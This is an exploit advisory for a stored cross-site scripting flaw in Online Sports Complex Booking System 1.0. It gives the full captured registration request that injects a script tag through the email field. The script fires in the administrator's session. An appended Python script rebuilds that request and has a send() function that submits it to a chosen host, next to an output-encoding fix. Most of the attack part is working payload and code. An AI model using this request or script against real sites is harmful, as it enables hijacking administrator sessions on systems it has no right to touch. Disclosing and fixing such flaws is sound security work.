## https://sploitus.com/exploit?id=PACKETSTORM:166641
Title: Online Sports Complex Booking System 1.0 XSS  
Author: Zllggggg  
Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html  
Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip  
Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.md  
Tested on: Windows, MySQL, Apache  
  
Description:  
  
When registering a client through the public registration form, intercept the  
submission with Burp Suite, change the `email` parameter to  
`<script>alert(1)</script>` and forward the request. The value is stored  
without sanitisation. Logging in to the back end as administrator and opening  
"Registered Clients" renders the stored value and triggers the pop-up, i.e. a  
stored XSS that executes in the administrator's session.  
  
Data packet  
POST /scbs/classes/Users.php?f=save_client HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------289647566033806702832762971625  
Content-Length: 1284  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/scbs/register.php  
Cookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="id"  
  
1  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="firstname"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="middlename"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="lastname"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="gender"  
  
Male  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="contact"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="address"  
  
ca  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="email"  
  
<script>alert(1)</script>  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="password"  
  
123  
-----------------------------289647566033806702832762971625  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------289647566033806702832762971625--
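The following script is an added example, not part of the original advisory. It rebuilds the captured `save_client` request (same endpoint, same fields, same boundary, only `email` carries the payload) with the standard library so the multipart encoding can be inspected offline, and it puts the vulnerable rendering pattern next to its fix. The `render_client_row_*` functions are illustrative: the application's real PHP template is not shown on the page, and the PHP equivalent of the fix would be `htmlspecialchars($email, ENT_QUOTES, 'UTF-8')` at output time plus server-side email validation on input. `send()` only runs when you call it against a lab host you own.

```python
"""Rebuild the advisory's registration request and show the output-encoding fix.
Standard library only; nothing is sent unless send() is called explicitly."""
import html
import http.client
from typing import Dict, List, Tuple

# Boundary copied from the captured packet; any unique token would do.
BOUNDARY = "---------------------------289647566033806702832762971625"
PAYLOAD = "<script>alert(1)</script>"
PATH = "/scbs/classes/Users.php?f=save_client"


def build_multipart(fields: List[Tuple[str, str]], boundary: str = BOUNDARY) -> bytes:
    """Encode text fields as multipart/form-data the way a browser form POST does.
    A trailing empty "img" file part mirrors the captured packet exactly."""
    parts = []
    for name, value in fields:
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n"
        )
    parts.append(
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="img"; filename=""\r\n'
        "Content-Type: application/octet-stream\r\n\r\n\r\n"
    )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode("utf-8")


def save_client_request(email: str, boundary: str = BOUNDARY) -> Tuple[str, Dict[str, str], bytes]:
    """Return (path, headers, body) with the field set from the captured packet.
    The filler values ("ca", "Male", "123", id=1) are the advisory's; only
    `email` is attacker-controlled here."""
    fields = [
        ("id", "1"), ("firstname", "ca"), ("middlename", "ca"), ("lastname", "ca"),
        ("gender", "Male"), ("contact", "ca"), ("address", "ca"),
        ("email", email), ("password", "123"),
    ]
    body = build_multipart(fields, boundary)
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "X-Requested-With": "XMLHttpRequest",
    }
    return PATH, headers, body


def send(host: str, email: str = PAYLOAD, port: int = 80) -> int:
    """Submit the registration to a lab instance (hypothetical host) and return
    the HTTP status; the stored value fires when an admin views the client list."""
    path, headers, body = save_client_request(email)
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", path, body=body, headers=headers)
    status = conn.getresponse().status
    conn.close()
    return status


def render_client_row_unsafe(email: str) -> str:
    """Bug class shown in the advisory: stored value echoed into HTML verbatim."""
    return f"<td>{email}</td>"


def render_client_row_safe(email: str) -> str:
    """Fix: HTML-encode on output so '<', '>', '&' and quotes become entities."""
    return f"<td>{html.escape(email, quote=True)}</td>"


if __name__ == "__main__":
    _, hdrs, body = save_client_request(PAYLOAD)
    print(hdrs["Content-Type"])
    print(body.decode())
    print(render_client_row_unsafe(PAYLOAD))
    print(render_client_row_safe(PAYLOAD))
```

Run it without arguments to see the exact bytes the browser sent; the `Content-Length` in the captured packet differs only because its header block and filler values were Firefox's. Validating `email` against an address pattern on the server removes this particular vector, but output encoding in the admin template is what closes the bug for every field.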